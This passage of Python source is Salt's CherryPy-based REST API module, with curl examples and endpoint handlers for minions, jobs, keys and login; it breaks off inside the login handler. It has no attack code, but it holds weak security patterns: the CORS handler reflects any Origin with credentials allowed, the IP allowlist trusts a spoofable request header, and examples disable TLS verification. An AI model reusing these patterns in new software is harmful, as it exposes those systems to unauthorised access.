The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`client interfaces <netapi-clients>`
documentation, but in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
  equivalent, but they typically manage Master-side resources such as state
  files, pillar files, and the Salt config files; the :py:mod:`key wheel
  module <salt.wheel.key>` exposes functionality similar to the ``salt-key``
  CLI command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<netapi-clients>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
# Import Python libs
from __future__ import absolute_import
import collections
import itertools
import functools
import logging
import json
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
# pylint: disable=import-error
import cherrypy
import yaml
import salt.ext.six as six
# pylint: enable=import-error
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def html_override_tool():
'''
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
'''
apiopts = cherrypy.config['apiopts']
request = cherrypy.request
url_blacklist = (
apiopts.get('app_path', '/app'),
apiopts.get('static_path', '/static'),
)
if 'app' not in cherrypy.config['apiopts']:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get('Accept') == '*/*':
return
try:
wants_html = cherrypy.lib.cptools.accept('text/html')
except cherrypy.HTTPError:
return
else:
if wants_html != 'text/html':
return
raise cherrypy.InternalRedirect(apiopts.get('app_path', '/app'))
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_api_acl_tool(username, request):
'''
.. versionadded:: 2016.3.0
Verifies user requests against the API whitelist (user/IP pairs) in
order to provide whitelisting for the API, similar to the master, but
enforced at the API layer.
.. code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
'''
failure_str = ("[api_acl] Authentication failed for "
"user {0} from IP {1}")
success_str = ("[api_acl] Authentication sucessful for "
"user {0} from IP {1}")
pass_str = ("[api_acl] Authentication not checked for "
"user {0} from IP {1}")
acl = None
# Salt Configuration
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get('api_acl', None)
ip = request.remote.ip
if acl:
users = acl.get('users', {})
if users:
if username in users:
if ip in users[username] or '*' in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and '*' in users:
if ip in users['*'] or '*' in users['*']:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
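A typical preflight exchange handled by this pair of tools looks roughly
like the following (header values are illustrative):
.. code-block:: http
OPTIONS / HTTP/1.1
Host: localhost:8000
Origin: http://example.com
Access-Control-Request-Method: POST
HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://example.com
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Headers: X-Auth-Token, Content-Type
Access-Control-Allow-Credentials: true
Access-Control-Max-Age: 1400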
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc())
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
return out(ret)
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
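# e.g. a urlencoded body of client=local&tgt=*&fun=test.arg&arg=one
# arrives here as {'client': 'local', 'tgt': '*', 'fun': 'test.arg',
# 'arg': 'one'} and is normalized below into the single-chunk lowstate
# [{'client': 'local', 'tgt': '*', 'fun': 'test.arg', 'arg': ['one']}]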
if data and not isinstance(data, list):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_request_body',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
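A single chunk, after the per-session fields below have been injected,
might look like this (values are illustrative):
.. code-block:: python
{
'client': 'local',
'tgt': '*',
'fun': 'test.ping',
'token': 'd40d1e1e',
'__current_eauth_user': 'saltdev',
}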
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if cherrypy.session.get('user'):
chunk['__current_eauth_user'] = cherrypy.session.get('user')
if cherrypy.session.get('groups'):
chunk['__current_eauth_groups'] = cherrypy.session.get('groups')
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: http
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
'''
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: http
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: http
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
[{"tgt": "*", "fun": "status.diskusage"}]
**Example response:**
.. code-block:: http
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: http
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: http
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = [{
'client': 'runner',
'fun': 'jobs.list_job' if jid else 'jobs.list_jobs',
'jid': jid,
}]
cherrypy.request.lowstate = lowstate
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
# Guard against a missing 'Result' key for jobs with no returns yet
returns = job_ret_info[0].get('Result', {})
for minion in returns.keys():
# u'return' and 'return' are the same key; one lookup suffices
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the functions in the
:py:mod:`key wheel module <salt.wheel.key>`.
'''
@cherrypy.config(**{'tools.salt_token.on': True})
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: http
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: http
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>` function.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: http
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = six.moves.StringIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
tarball.addfile(pub_key_file, six.moves.StringIO(pub_key))
tarball.addfile(priv_key_file, six.moves.StringIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = len(fileobj.getvalue())
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: http
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: http
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: http
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
